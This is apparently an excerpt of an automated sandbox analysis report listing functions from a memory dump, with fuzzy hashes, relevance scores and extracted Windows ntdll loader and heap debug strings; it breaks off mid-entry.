Opcode Fuzzy Hash: 54872df48a993532ba6ec0b5bf0dcae3599e78d41e066ccde87c3e9071b1f3ac
Instruction Fuzzy Hash: 17C14B31A00216ABDF25CFACD885F7E7BA9EF95B00F044069DD0FAB291E7788944C391

Function 019B63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Delaying execution failed with status 0x%08lx, xrefs: 019F4258
_LdrpInitialize, xrefs: 019F40DF, 019F4141, 019F4205, 019F425F
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 019F40D8
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 019F41FE
minkernel\ntdll\ldrinit.c, xrefs: 019F40E9, 019F414B, 019F420F, 019F4269
Process initialization failed with status 0x%08lx, xrefs: 019F413A

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 12d3ac471363c3eb7108979079d4fba5e4d54a50b5337bf1913c3b8dc7dc2fb7
Instruction ID: 0dceb77e734a829f4e04c83add54a97900ded4322b0398d0e1aabbf7c15416d4
Opcode Fuzzy Hash: 12d3ac471363c3eb7108979079d4fba5e4d54a50b5337bf1913c3b8dc7dc2fb7
Instruction Fuzzy Hash: E5916D35B01715ABEB35DF18DD84FEA7BAABF90B25F04012CD60C6B281D778A902C791

Function 01A2F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON

Download Yara Rule

Strings

Just allocated block at %p for %Ix bytes, xrefs: 01A2F708
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 01A2F809
RtlAllocateHeap, xrefs: 01A2F56D
HEAP: , xrefs: 01A2F6F4, 01A2F7A1, 01A2F7F8
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 01A2F7BE
HEAP[%wZ]: , xrefs: 01A2F6E7, 01A2F794, 01A2F7EB

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 0-1745908468
Opcode ID: cefeb505ee850a0da015c7420f8573f49db16fefa2a8bafd4ca5b05e0ed631ac
Instruction ID: e6331af4d4eebf8213f92b58e32a5c86106f2132de2bf3eb41f8d9b6e7f187f7
Opcode Fuzzy Hash: cefeb505ee850a0da015c7420f8573f49db16fefa2a8bafd4ca5b05e0ed631ac
Instruction Fuzzy Hash: 6D910332900691DFDB26DF6CC840AADFBF2FF99714F19801DE459AB261C7759941CB10

Function 0197645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 019D99ED
LdrpInitShimEngine, xrefs: 019D99F4, 019D9A07, 019D9A30
Getting the shim engine exports failed with status 0x%08lx, xrefs: 019D9A01
apphelp.dll, xrefs: 01976496
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 019D9A2A
minkernel\ntdll\ldrinit.c, xrefs: 019D9A11, 019D9A3A

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 2e0ac6326c5b31338a459928eb49476d7cedd70502a4a2bde7b9069054b62db4
Instruction ID: 6a928f8522de30c1ef636d3fe7b2a93600abd8dd765eb095c6051616943fdd3b
Opcode Fuzzy Hash: 2e0ac6326c5b31338a459928eb49476d7cedd70502a4a2bde7b9069054b62db4
Instruction Fuzzy Hash: 785190726087059BE721EF24C891FABB7E8EFC4648F01491DE58D9B1A0D630EA05CB93

Function 019AF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019F02BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019F02E7
RTL: Re-Waiting, xrefs: 019F031E

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 8fe2342affef2c003bf74bc9cadcf95c8f399093a53056448347cd7dc02890af
Instruction ID: 677dcfa0c51f10ecabb1c3bce3c072e1ee30d6c4e543997549c59f6141a64756
Opcode Fuzzy Hash: 8fe2342affef2c003bf74bc9cadcf95c8f399093a53056448347cd7dc02890af
Instruction Fuzzy Hash: 0EE1C0306047419FD725CF28C884B6ABBE9FF84314F540A1DF6A98B2D2D774D949CB92

Function 019A51EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

Kernel-MUI-Language-Allowed, xrefs: 019A527B
Kernel-MUI-Language-Disallowed, xrefs: 019A5352
Kernel-MUI-Language-SKU, xrefs: 019A542B
Kernel-MUI-Number-Allowed, xrefs: 019A5247
WindowsExcludedProcs, xrefs: 019A522A

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 7632da2a581f6e58f8f61e4cb6174573be2b20da3cab283c399efb90740e5361
Instruction ID: 18bdc0c882ab2657feab643c75411006b31b75312ac3b23e3e72bb30e2956a89
Opcode Fuzzy Hash: 7632da2a581f6e58f8f61e4cb6174573be2b20da3cab283c399efb90740e5361
Instruction Fuzzy Hash: 3CF14B72E10219EBDF12DFA9C9449EEBBFDFF48610F55405AE909E7210E6709E048B90

Function 019970C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01997C96, 01998696
HEAP: , xrefs: 01997C7C, 0199867F
HEAP[%wZ]: , xrefs: 01997C6D, 01998670

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 857e608d07b12c396b769c89775a8b402f6c65318c489ab5e13d382b366e6ada
Instruction ID: 5eb0215e0639544766b4bf8f8b367554e0fc42bfe4ec208af2ae0c8bcc76a3ef
Opcode Fuzzy Hash: 857e608d07b12c396b769c89775a8b402f6c65318c489ab5e13d382b366e6ada
Instruction Fuzzy Hash: CC139D70A00259DFEF29CF6DC480BA9BBB5BF49304F1485ADD949AB382D734A945CF90

Function 01991070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON

Download Yara Rule

Strings

!(CheckedFlags & ~HEAP_CREATE_VALID_MASK), xrefs: 019E588F
@, xrefs: 019E5A53
HEAP: , xrefs: 019E5884
HEAP[%wZ]: , xrefs: 019E5877

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
API String ID: 0-3570731704
Opcode ID: a5cfef5f95eac02ada6746d6b2f5c296018cdba1c0f71f996319ee4016f09070
Instruction ID: 84c6ac2e6ff83f3fb5ca4b5d88d7bfdafe4e497a6e4aeae6ff0f208151a18a71
Opcode Fuzzy Hash: a5cfef5f95eac02ada6746d6b2f5c296018cdba1c0f71f996319ee4016f09070
Instruction Fuzzy Hash: A3923875A0122ACFEF25CF18C844BA9B7B9BF45325F0581EAD94DAB291D7309E80CF51

Function 0198A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

6, xrefs: 0198A3F7
LdrResFallbackLangList Exit, xrefs: 0198A3FF
8, xrefs: 0198A3E7
LdrResFallbackLangList Enter, xrefs: 0198A3EF

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 21a0efa0b17c411f5a0b5c63512c30d1a16b6cff9248ab126eb7c52bf2e951ac
Instruction ID: 52bb3a57f8029428d1781bd91a7af89609decb03e6519d047ee48078437f80c4
Opcode Fuzzy Hash: 21a0efa0b17c411f5a0b5c63512c30d1a16b6cff9248ab126eb7c52bf2e951ac
Instruction Fuzzy Hash: 59C19E71508382CFD712EF68C044B6AB7E8FF84704F04486EF9999B251E738CA45CB62

Function 019B8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 019B8422
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 019B855E
@, xrefs: 019B8591
minkernel\ntdll\ldrinit.c, xrefs: 019B8421

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 8c839011bea4d0c243a359dbe3e9a6584e374f1274c63c2c8e8103fdfd60f66b
Instruction ID: de5f9966885071bf5562365ed4a33bee676a4cf2f4310056bc96997a7c1f2f41
Opcode Fuzzy Hash: 8c839011bea4d0c243a359dbe3e9a6584e374f1274c63c2c8e8103fdfd60f66b
Instruction Fuzzy Hash: 29916D71508345AFE721DF65CD80FABBAECBB88744F40092EFA8C96151E774D9448B52

Function 019864AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 019E0FE5
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 019E106B
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 019E1028
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019E10AE

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 9d9e86d6c28c57d54ff8dbcafc8246b92529647185906a575267c9caadabc4c2
Instruction ID: 8cd8883db6c413cd1dc7866ba5dbbb2856f4b9cc58268161a88b096736ef6aa6
Opcode Fuzzy Hash: 9d9e86d6c28c57d54ff8dbcafc8246b92529647185906a575267c9caadabc4c2
Instruction Fuzzy Hash: F971AFB19043059FDB21EF18C885F9B7FA8AF95764F440868F94C8B246D774D588CBE2

Function 01A311A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON

Download Yara Rule

Strings

This is located in the %s field of the heap header., xrefs: 01A312D6
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 01A31261
HEAP: , xrefs: 01A3124A, 01A3125D, 01A3125F, 01A312C4
HEAP[%wZ]: , xrefs: 01A3123D, 01A312B7

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 0-336120773
Opcode ID: d572f1b37d1cb395e1714393a39b3aa356f62c4b15244153f3ba486d02c45594
Instruction ID: 78036ec9b00ff6399669d1bde71d11da38937a5d193249da768cfac42aa3cc3f
Opcode Fuzzy Hash: d572f1b37d1cb395e1714393a39b3aa356f62c4b15244153f3ba486d02c45594
Instruction Fuzzy Hash: AF312472200200EFD711DBD8CC85F66B7E8EFC8768F190069F51ADB291EA31AC40CB65

Function 019A245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

LdrpDynamicShimModule, xrefs: 019EA998
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 019EA992
apphelp.dll, xrefs: 019A2462
minkernel\ntdll\ldrinit.c, xrefs: 019EA9A2

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 3d8a5d3f969c2b8dfeabe5726e9d5537d63bb47169c9038c1b2671248c902df2
Instruction ID: 8215146ea74abbb66d6bb25b3ae94ccf97edcaf0c829eb7b8b283b92e1b2f589
Opcode Fuzzy Hash: 3d8a5d3f969c2b8dfeabe5726e9d5537d63bb47169c9038c1b2671248c902df2
Instruction Fuzzy Hash: 31312879A00301ABDB32DF5DDC49EAAB7F9FFC4B00F160019E90867265C7749A46C780

Function 01979148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

VirtualQuery Failed 0x%p %x, xrefs: 019DBAF7
HEAP: , xrefs: 019DBAAD, 019DBAEA
VirtualProtect Failed 0x%p %x, xrefs: 019DBABA
HEAP[%wZ]: , xrefs: 019DBAA0, 019DBADD

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 0-1391187441
Opcode ID: 1ab4affc26d06deb708a056590646dbaa62cb8c8f756ccfc88785b84e0f51f56
Instruction ID: 39eec217cff19a3da1d61e277a4dfb6981929aac4e7ceabee20ddec4ed533177
Opcode Fuzzy Hash: 1ab4affc26d06deb708a056590646dbaa62cb8c8f756ccfc88785b84e0f51f56
Instruction Fuzzy Hash: A0319E32600205EFDB01DB59CC84FAABBF8FF85B75F168059E91DA7291D670E940CB61

Function 01A294E0 Relevance: 4.3, Strings: 3, Instructions: 558COMMON

Download Yara Rule

Strings

, xrefs: 01A29B84
, xrefs: 01A29AD7
0, xrefs: 01A29BF6

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: $ $0
API String ID: 0-3352262554
Opcode ID: 41d7acc078e6aa322456467e070dfcae834279999290009b8433b1f6ddb70c5f
Instruction ID: 72492066a5037980e4eb1c71c1946506c1138b7f86a9b383c2ed9fb6cd58fc7b
Opcode Fuzzy Hash: 41d7acc078e6aa322456467e070dfcae834279999290009b8433b1f6ddb70c5f
Instruction Fuzzy Hash: E93225B16083A18FE720CF68C984B5BBBE5BF88708F04492EF59987350D775E949CB52

Function 0197A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 019DC1E4
UseFilter, xrefs: 0197A1C1
FilterFullPath, xrefs: 019DC2E6

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 2bc0600f6c125098dba0e3f246c04eed8517a169cbb2da3d91b1d9341d1cad91
Instruction ID: cf0b4ea0b84afb274026637233e5bfbeb46387a716f55a0084a41659b6f8ba14
Opcode Fuzzy Hash: 2bc0600f6c125098dba0e3f246c04eed8517a169cbb2da3d91b1d9341d1cad91
Instruction Fuzzy Hash: EEA16B759116299BDB31DF68CC88BEAB7B8EF44B10F1041EAE90CA7250DB359E85CF50

Function 0198B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON

Download Yara Rule

Strings

LdrpResGetResourceDirectory Exit, xrefs: 0198B477
LdrpResGetResourceDirectory Enter, xrefs: 0198B465
{, xrefs: 019E37B6

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
API String ID: 0-373624363
Opcode ID: e18aaf062fca61baa9fb781e0d2f2a8b28d97232c18ec4cbccdc6a434a674cff
Instruction ID: df7bb2454bc566aedf38854695263866d8f7c1e17c3d55ad000af77b27421be9
Opcode Fuzzy Hash: e18aaf062fca61baa9fb781e0d2f2a8b28d97232c18ec4cbccdc6a434a674cff
Instruction Fuzzy Hash: F591F371A0420ACFEB22DF58C444BAE7BF4FF05725F184595E81AAB291D378DA41CBA0

Function 019B909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

&, xrefs: 019F5CF8
@, xrefs: 019B9148
%, xrefs: 019F5D3F

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: %$&$@
API String ID: 0-1537733988
Opcode ID: bdaa6c9f65d23a414b31241fb9130019424cd5ab4e9c7eb74e102374f02b05c3
Instruction ID: cadd7c9bf42c22cf7b46a419a8031e26c0b61a148892ad7329b5140e8d5b6f36
Opcode Fuzzy Hash: bdaa6c9f65d23a414b31241fb9130019424cd5ab4e9c7eb74e102374f02b05c3
Instruction Fuzzy Hash: A571B0B09193029FD715DF24CAC0AABBBE9BFC5618F108A1DF69E47251C730D905CB92

Function 019A15F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrmap.c, xrefs: 019EA59A
Could not validate the crypto signature for DLL %wZ, xrefs: 019EA589
LdrpCompleteMapModule, xrefs: 019EA590

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: d963feacea5b646c42af41a095c6abde4943e77c241cb8b6b3ccc0b1e6fe2e0a
Instruction ID: 000ccf0a12854cb6ebc923e966765309a59bc3c859b5abece9fdd7c6b8232c09
Opcode Fuzzy Hash: d963feacea5b646c42af41a095c6abde4943e77c241cb8b6b3ccc0b1e6fe2e0a
Instruction Fuzzy Hash: FE5116306007459BEB22CF6CCA48F2A7BE8BF40764F580565FA59DB6E2D774E904CB80

Function 0197758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

Invalid address specified to %s( %p, %p ), xrefs: 019DAFCB
HEAP: , xrefs: 019DAFB8
HEAP[%wZ]: , xrefs: 019DAFAB

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: 3cf63bb3ec7fccfb7c421363c5433bfbdb35124729ff8195e1f99bbd9b01a3f4
Instruction ID: b8caf0f60d4f02304f0d993b42f35ce5536e42287944f7d069649f3d8b5afbec
Opcode Fuzzy Hash: 3cf63bb3ec7fccfb7c421363c5433bfbdb35124729ff8195e1f99bbd9b01a3f4
Instruction Fuzzy Hash: 604129B03002409FEF3ECAACC588B797BE59F41355F1884E9D54E8B28BD674D895C752

Function 01A3C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 01A3C212
@, xrefs: 01A3C1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01A3C1C5

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: e4d544d153458d22da09b78eeccbf84c9054a80633f66f0147d5b11ffd58630b
Instruction ID: 0ea7d1e15762d2191edda0bae02f7d7ec9b9c5cd99596c613b5aa066d4ce9406
Opcode Fuzzy Hash: e4d544d153458d22da09b78eeccbf84c9054a80633f66f0147d5b11ffd58630b
Instruction Fuzzy Hash: 23415572E00219EBDF11EBD8CC51FEEBBB8AB94710F14416BFA09B7244D7749A448B90

Function 01A14144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

@, xrefs: 01A14225
LdrpResValidateFilePath Enter, xrefs: 01A14160
LdrpResValidateFilePath Exit, xrefs: 01A14172

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: e4a401b3f7d1ba88aae95c4b9ce4eb8f815b7faa003cdb1af3b8ee6360b5c93e
Instruction ID: 5c251cf2bce81f8827da158355a9a01d6d3ce88423c50abbbbef31baa5db11d4
Opcode Fuzzy Hash: e4a401b3f7d1ba88aae95c4b9ce4eb8f815b7faa003cdb1af3b8ee6360b5c93e
Instruction Fuzzy Hash: B7412232A047588BEB26DBEDC840BEDBBB9FF99340F28045AD905EB785D7348941CB50

Function 019B33A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON

Download Yara Rule

Strings

Actx , xrefs: 019B33AC
SXS: %s() passed the empty activation context data, xrefs: 019F29FE
RtlCreateActivationContext, xrefs: 019F29F9

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
API String ID: 0-859632880
Opcode ID: 22b9682c4c7eb820e6ccce3d151a16e36972ccb0d165a71d91247fb72a712ffa
Instruction ID: 7884f93df0e6a6ead7d5eff5058c67b68bc89fe5dca453733e27d12cb8a7a245
Opcode Fuzzy Hash: 22b9682c4c7eb820e6ccce3d151a16e36972ccb0d165a71d91247fb72a712ffa
Instruction Fuzzy Hash: 90312436600705AFEB22DF69D9C4F967BA9BB44B11F054469EE0C9F281C734E945C790

Function 01A0B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON

Download Yara Rule

Strings

@, xrefs: 01A0B670
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 01A0B632
GlobalFlag, xrefs: 01A0B68F

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: eacc03078076790b4023d8a2f580eca4388cee1a2cf4b920d7d3b81a1c19dbcd
Instruction ID: b768bc1121edfd58e775577b69972000af7b0d6b9a0ce8c8e54d54e4be3088ff
Opcode Fuzzy Hash: eacc03078076790b4023d8a2f580eca4388cee1a2cf4b920d7d3b81a1c19dbcd
Instruction Fuzzy Hash: FD315EB5E00209AFEB11EF99DD80AEFBB7CEF44744F140469E609A7190D7749E00CBA4

Function 019C1270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON

Download Yara Rule

Strings

@, xrefs: 019C12A5
BuildLabEx, xrefs: 019C130F
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 019C127B

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3051831665
Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction ID: 4f8071a3e45aa079f9099e9196f12a00137d9e454efb9c066a5538d441da0399
Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction Fuzzy Hash: 04319072900519FFDB12EF95CC44EDEBBBDEB94A54F004429EA48A7260D730DA058B65

Function 01A020DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

LdrpInitializationFailure, xrefs: 01A020FA
Process initialization failed with status 0x%08lx, xrefs: 01A020F3
minkernel\ntdll\ldrinit.c, xrefs: 01A02104

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 17335ae9e547d886188b3affa2b3d817716d97796b0d311718aebdc475f609d4
Instruction ID: 55c6074acaaf9b72a7d12771fb6ca4da73b648ee395dc980b26a7680bd926db5
Opcode Fuzzy Hash: 17335ae9e547d886188b3affa2b3d817716d97796b0d311718aebdc475f609d4
Instruction Fuzzy Hash: 52F0C239A40308BBEB25E74CED56F99776CFBC0B54F510069FA48772C5D2B0AA01CB92

Function 019903E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 019E4D8A

Strings

#%u, xrefs: 019E4D82

Memory Dump Source

Source File: 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1950000_x.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 5df8c85d049f369e9d741ca80b1a96854a6c3e13e0cec4ee5af184b3bae55b95
Instruction ID: 4ad5d5adf17bec72113f5a1e0a15c820508503681b2a29c2f42e270b065625ce
Opcode Fuzzy Hash: 5df8c85d049f369e9d741ca80b1a96854a6c3e13e0cec4ee5af184b3bae55b95
Instruction Fuzzy Hash: 58715B71A0014A9FDF02DFA9C994FAEB7F8BF48744F144065E909E7251EA34EE41CBA1

Function 019952A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

